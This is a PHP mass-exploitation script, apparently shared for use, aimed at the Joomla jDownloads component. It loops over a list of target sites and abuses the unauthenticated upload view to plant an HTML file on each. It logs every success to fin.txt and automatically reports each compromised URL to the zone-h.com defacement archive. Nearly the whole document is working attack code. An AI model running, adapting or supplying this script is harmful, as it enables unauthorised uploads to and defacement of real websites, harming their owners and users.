exploit joomla jdownloads

1. <?php
2.  
3. /*
4.  
5.  Kro0oz ~
6.  
7. */
8.  @set_time_limit(0);
9.    print"
10.  _     _                     _                 _
11. (_) __| | _____      ___ __ | | ___   __ _  __| |___
12. | |/ _` |/ _ \ \ /\ / / '_ \| |/ _ \ / _` |/ _` / __|
13. | | (_| | (_) \ V  V /| | | | | (_) | (_| | (_| \__ \
14. _/ |\__,_|\___/ \_/\_/ |_| |_|_|\___/ \__,_|\__,_|___/
15. |__/      exploit joomla jdownloads/wis
16.  
17.  ";
18.  
19.  
20. echo "\n";
21.  
22. echo "\t ur list of sites : ";$x=trim(fgets(STDIN,1024));
23.  
24.     echo "\n";
25.  
26. $get=@file_get_contents($x);
27. $ex=explode("\r\n",$get);
28. foreach($ex as $mag){
29.     echo "\t[+] scannign -->".$mag;
30.     echo jd($mag);
31. }
32. function jd($url){
33.  
34.      $file1='Kro0oz.html.zip';
35.      $file2='Kro0oz.html.j';
36.  
37.      $bbb='/index.php?option=com_jdownloads&Itemid=0&view=upload';
38.      $sco=($url).($bbb);
39.  
40.         $post=array(
41.     'name'=>'ur name','mail'=>'badboysa@gmail.com','catlist'=>'1','file_upload'=>"@$file1",'filetitle' =>"lolz",
42.     'description'=>"<p>zot</p>" ,'2d1a8f3bd0b5cf542e9312d74fc9766f'=>1,
43.     'send'=>1,'senden'=>"Send file", 'description'=>"<p>qsdqsdqsdqsdqsdqsdqsd</p>",
44.     'option'=>"com_jdownloads",'view'=>"upload",'pic_upload'=>"@$file2"
45.     );
46.         $ch = curl_init ($sco);
47.         curl_setopt ($ch, CURLOPT_RETURNTRANSFER, TRUE);
48.         curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, TRUE);
49.         curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT,3 );
50.         curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36");
51.         curl_setopt ($ch, CURLOPT_POST, TRUE);
52.         curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
53.         $data = curl_exec ($ch);
54.  
55.         curl_close ($ch);
56.     $path='/images/jdownloads/screenshots/';
57.     $final=($url).($path).($file2);
58.     if(eregi('The file was successfully transferred to the server!',$data)or preg_match("/color=\"green\">/",$data)){
59.       echo "\n\t\t".'yes -->'.$final."\n";
60.      
61.  echo "Hash: " . $final . PHP_EOL;
62.     $fp = fopen("fin.txt", "a+");
63.     fwrite($fp, $final . PHP_EOL);
64.    
65.           $ch = curl_init ("http://www.zone-h.com/notify/single");
66.     curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
67.     curl_setopt ($ch, CURLOPT_POST, 1);
68.         curl_setopt ($ch, CURLOPT_POSTFIELDS, "defacer=neme&domain1=$final&hackmode=1&reason=1");
69.         if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch))){
70.                 echo  "\t\tZone-h --> Ok  ". "\n\n";
71.         }else{
72.                 echo "\t\tZone-h --> No". "\n\n"; }
73.     curl_close ($ch);
74.  
75.  
76.     }else{
77.       echo "\n\t\t".$url." --> not infected \n\n";
78.  
79.          
80.        
81.  
82.    
83.  
84.    
85.     }
86.     }
87.  
88.  
89.  
90. ?>